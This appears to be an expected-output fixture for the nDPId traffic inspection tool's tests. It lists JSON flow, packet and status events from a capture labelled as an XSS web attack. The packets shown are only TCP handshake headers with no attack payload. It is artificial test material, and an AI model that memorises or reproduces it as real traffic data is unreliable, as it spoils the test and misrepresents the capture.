-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":1499347532561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347532561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ro5AAD4GF0qsEAABwKgKMuNWAFA1F6EebtxtroAQAOVy0AAAAQEICgE7D5AD5OEF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347535081,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347535081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vMpAAD4GCQasEAABwKgKMuNwAFAre67MAAAAAKACchCNugAAAgQFtAQCCAoBOxIGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4735,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ43Bd+kT3K3uuzaAScSAESAAAAgQFtAQCCAoD5ON7ATsSBgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4736,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vMtAAD4GCQ2sEAABwKgKMuNwAFAre67NXfpE+IAQAOWjTwAAAQEICgE7EgYD5ON7"} -00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4740,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":4740,"packets-processed":4739,"total-skipped-flows":0,"total-l4-data-len":2075670,"total-not-detected-flows":0,"total-guessed-flows":245,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":79,"total-active-flows":334,"total-idle-flows":255,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1852,"global_ts_msec":1499347536104} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347536332,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGJAAD4GPW6sEAABwKgKMuN+AFBSPZtdAAAAAKACchB5IAAAAgQFtAQCCAoBOxM\/AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ434l0Xf0Uj2bXqAScSDzoAAAAgQFtAQCCAoD5OS0ATsTPwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":3,"flow_last_seen":1499347536333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347536333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGNAAD4GPXWsEAABwKgKMuN+AFBSPZteJdF39YAQAOWSqAAAAQEICgE7Ez8D5OS0"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347537591,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347537591,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UmRAAD4Gc2ysEAABwKgKMuOMAFC1fUYeAAAAAKACchBp1gAAAgQFtAQCCAoBOxR6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":2,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ44xyZUlKtX1GH6AScSDFMQAAAgQFtAQCCAoD5OXvATsUegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":3,"flow_last_seen":1499347537592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347537592,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UmVAAD4Gc3OsEAABwKgKMuOMAFC1fUYfcmVJS4AQAOVkOQAAAQEICgE7FHoD5OXv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347540145,"flow_last_seen":1499347540145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347540145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1499347540145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BSZAAD4GwKqsEAABwKgKMuOmAFDsIBPeAAAAAKACchBi2wAAAgQFtAQCCAoBOxb4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":2,"flow_last_seen":1499347540145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ46adBfH37CAT36AScSDoagAAAgQFtAQCCAoD5OhtATsW+AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4776,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":3,"flow_last_seen":1499347540146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347540146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BSdAAD4GwLGsEAABwKgKMuOmAFDsIBPfnQXx+IAQAOWHcgAAAQEICgE7FvgD5Oht"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347541398,"flow_last_seen":1499347541398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347541398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1499347541398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WJdAAD4GbTmsEAABwKgKMuO0AFCKGUCmAAAAAKACchCW0wAAAgQFtAQCCAoBOxgxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":2,"flow_last_seen":1499347541398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ47RdwzayihlAp6AScSAVsQAAAgQFtAQCCAoD5OmnATsYMQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":3,"flow_last_seen":1499347541399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347541399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WJhAAD4GbUCsEAABwKgKMuO0AFCKGUCnXcM2s4AQAOW0uAAAAQEICgE7GDED5Omn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347542648,"flow_last_seen":1499347542648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347542648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1499347542648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80V9AAD4G9HCsEAABwKgKMuPCAFCPt8g1AAAAAKACchAIXwAAAgQFtAQCCAoBOxlqAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":2,"flow_last_seen":1499347542648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ48Js\/FwIj7fINqAScSBRdQAAAgQFtAQCCAoD5OrfATsZagEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":3,"flow_last_seen":1499347542649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347542649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00WBAAD4G9HesEAABwKgKMuPCAFCPt8g2bPxcCYAQAOXwfAAAAQEICgE7GWoD5Orf"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347545176,"flow_last_seen":1499347545176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347545176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1499347545176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HVZAAD4GqHqsEAABwKgKMuPcAFAahQa0AAAAAKACchA8gQAAAgQFtAQCCAoBOxviAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":1499347545176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ49weXgmaGoUGtaAScSAkLAAAAgQFtAQCCAoD5O1XATsb4gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":3,"flow_last_seen":1499347545177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347545177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HVdAAD4GqIGsEAABwKgKMuPcAFAahQa1Hl4Jm4AQAOXDMwAAAQEICgE7G+ID5O1X"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347546427,"flow_last_seen":1499347546427,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1499347546427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q6tAAD4GgiWsEAABwKgKMuPqAFBqhV6wAAAAAKACchCTPQAAAgQFtAQCCAoBOx0bAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4828,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":2,"flow_last_seen":1499347546428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546428,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4+qNxgXIaoVesaAScSAOGQAAAgQFtAQCCAoD5O6QATsdGwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":3,"flow_last_seen":1499347546428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347546428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q6xAAD4GgiysEAABwKgKMuPqAFBqhV6xjcYFyYAQAOWtIAAAAQEICgE7HRsD5O6Q"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 